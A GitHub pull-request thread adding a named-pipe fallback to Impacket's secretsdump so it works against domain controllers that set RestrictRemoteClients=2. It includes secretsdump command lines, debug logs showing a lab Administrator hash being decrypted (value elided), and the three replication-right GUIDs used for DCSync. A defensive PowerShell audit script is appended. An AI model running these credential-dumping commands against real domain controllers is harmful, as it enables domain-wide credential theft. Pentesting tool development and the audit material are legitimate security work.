Adding logic for DCs with RestrictRemoteClients = 2#2166

Open
clou42 wants to merge 1 commit into fortra:master from clou42:master

Conversation

@clou42

@clou42 clou42 commented Apr 1, 2026

Hi,

I figured that secretsdump fails with a rpc_c_access_denied error when a target DC has set the HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Rpc\RestrictRemoteClients = 2.

To resolve this, I added a fallback using the named pipe protocol sequence.
From Microsoft docs (https://learn.microsoft.com/en-us/windows-server/security/rpc-interface-restrict): "RPC clients that use the named pipe protocol sequence (ncacn_np) are exempt from all restrictions discussed in this section. The named pipe protocol sequence can't be restricted due to significant backwards compatibility issues."

This patch aims at resolving that. I tested it in my lab and did not see any adverse effects. (I also tried not to touch any working behavior; this is a pure fallback implementation.)
A log line is printed whenever we fall back to a named pipe.

Hope this helps others as well. In case of questions let me know.

@clou42

clou42 commented Apr 1, 2026

In case you want to reproduce:

Note that behavior is different with full DA accounts and users that are empowered to DCsync via ACLs.
The user testi2 has exactly these 3 permissions:

```powershell
$GuidReplicatingDirectoryChanges = [Guid]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
$GuidReplicatingDirectoryChangesAll = [Guid]"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
$GuidReplicationSynchronization = [Guid]"1131f6ab-9c07-11d1-f79f-00c04fc2dcd2"
```

Full error before patch:

```
impacket-secretsdump -debug -user-status north.sevenkingdoms.local/testi2@winterfell -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password:
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_vlIxMFVe
Traceback (most recent call last):
  File "/usr/share/doc/python3-impacket/examples/secretsdump.py", line 326, in dump
    self.__NTDSHashes.dump()
    ~~~~~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 3132, in dump
    userRecord = self.__remoteOps.DRSGetNCChangesSid(userSid)
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 623, in DRSGetNCChangesSid
    return self._DRSGetNCChanges(userSid, dsName)
           ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 627, in _DRSGetNCChanges
    self.__connectDrds()
    ~~~~~~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 498, in __connectDrds
    stringBinding = epm.hept_map(self.__smbConnection.getRemoteHost(), drsuapi.MSRPC_UUID_DRSUAPI,
                                 protocol='ncacn_ip_tcp')
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1330, in hept_map
    resp = dce.request(request)
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1415, in request
    answer = self.recv()
  File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 1883, in recv
    raise DCERPCException(rpc_status_codes[status_code])
impacket.dcerpc.v5.rpcrt.DCERPCException: rpc_s_access_denied
[-] rpc_s_access_denied
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
```

Working after applying the patch:

```
python3 examples/secretsdump.py -debug -user-status north.sevenkingdoms.local/testi2@winterfell -k
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
Password:
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_yBlDIuoL
[*] Endpoint Mapper (TCP/135) denied anonymous access; using authenticated epmapper pipe
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[-] CCache file is not found. Skipping...
[+] The specified path is not correct or the KRB5CCNAME environment variable is not defined
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Trying to connect to KDC at NORTH.SEVENKINGDOMS.LOCAL:88
[+] Calling DRSGetNCChanges for S-1-5-21-3535564289-1227224518-3437987830-500
[+] SID lookup unsuccessful, falling back to DRSCrackNames/GUID lookups
[+] Calling DRSCrackNames for S-1-5-21-3535564289-1227224518-3437987830-500
[+] Calling DRSGetNCChanges for {812cd957-89c7-426d-874c-93810c1a3217}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=north,DC=sevenkingdoms,DC=local
Administrator:500:...
```
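For defenders reading this thread, the practical takeaways are the two things the comments above name: the three replication extended rights that let a non-DA account like testi2 pull secrets over DRSUAPI, and the `RestrictRemoteClients` policy value that only limits TCP-based RPC (the named pipe transport stays open, as the quoted Microsoft text says). The audit script below is an added example, not part of the PR or of Impacket; it assumes the RSAT ActiveDirectory module, a session with read access to the domain ACL, and PowerShell Remoting to the DC. The function names and the `$DcSyncRights` table are the example's own.

```powershell
# Added audit example (not part of the PR): reports who holds the replication extended
# rights from the PR comment on the domain naming context, and reads the
# RestrictRemoteClients policy value the PR works around. Assumes RSAT's ActiveDirectory
# module and PowerShell Remoting to the DC.
Import-Module ActiveDirectory

# The three control-access-right GUIDs quoted in the PR, with their schema display names.
$DcSyncRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '1131f6ab-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Synchronize'
}

function Get-DcSyncPrincipals {
    # Walks the DACL of the domain NC and lists each identity with the replication rights
    # it is allowed. An ExtendedRight ACE with an empty ObjectType grants every extended
    # right, so it is reported too; review anything here that is not a DC or a known admin.
    $domainDN = (Get-ADDomain).DistinguishedName
    $acl = Get-Acl -Path "AD:\$domainDN"
    $extended = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $acl.Access |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and $_.ActiveDirectoryRights.HasFlag($extended) -and
            ($_.ObjectType -eq [guid]::Empty -or $DcSyncRights.ContainsKey($_.ObjectType.ToString()))
        } |
        Group-Object IdentityReference |
        ForEach-Object {
            $names = $_.Group | ForEach-Object {
                if ($_.ObjectType -eq [guid]::Empty) { 'ALL extended rights' }
                else { $DcSyncRights[$_.ObjectType.ToString()] }
            }
            [pscustomobject]@{ Identity = $_.Name; Rights = ($names | Sort-Object -Unique) -join ', ' }
        }
}

function Get-RpcRestrictRemoteClients {
    # Reads the policy value from the PR on one DC. A value of 2 is what makes the
    # anonymous ncacn_ip_tcp endpoint-mapper lookup fail with rpc_s_access_denied in the
    # first log above; it does not restrict the ncacn_np (named pipe) transport.
    param([Parameter(Mandatory)][string]$ComputerName)
    Invoke-Command -ComputerName $ComputerName -ScriptBlock {
        $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Rpc'
        $v = (Get-ItemProperty -Path $key -Name RestrictRemoteClients -ErrorAction SilentlyContinue).RestrictRemoteClients
        if ($null -eq $v) { 'RestrictRemoteClients: not configured' } else { "RestrictRemoteClients: $v" }
    }
}

Get-DcSyncPrincipals | Format-Table -AutoSize
Get-RpcRestrictRemoteClients -ComputerName (Get-ADDomainController).HostName
```

The rights listing is the more useful half: an account such as testi2 with exactly these three rights can replicate secrets without being a Domain Admin, so the DACL, not the RPC policy, is the control to watch.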
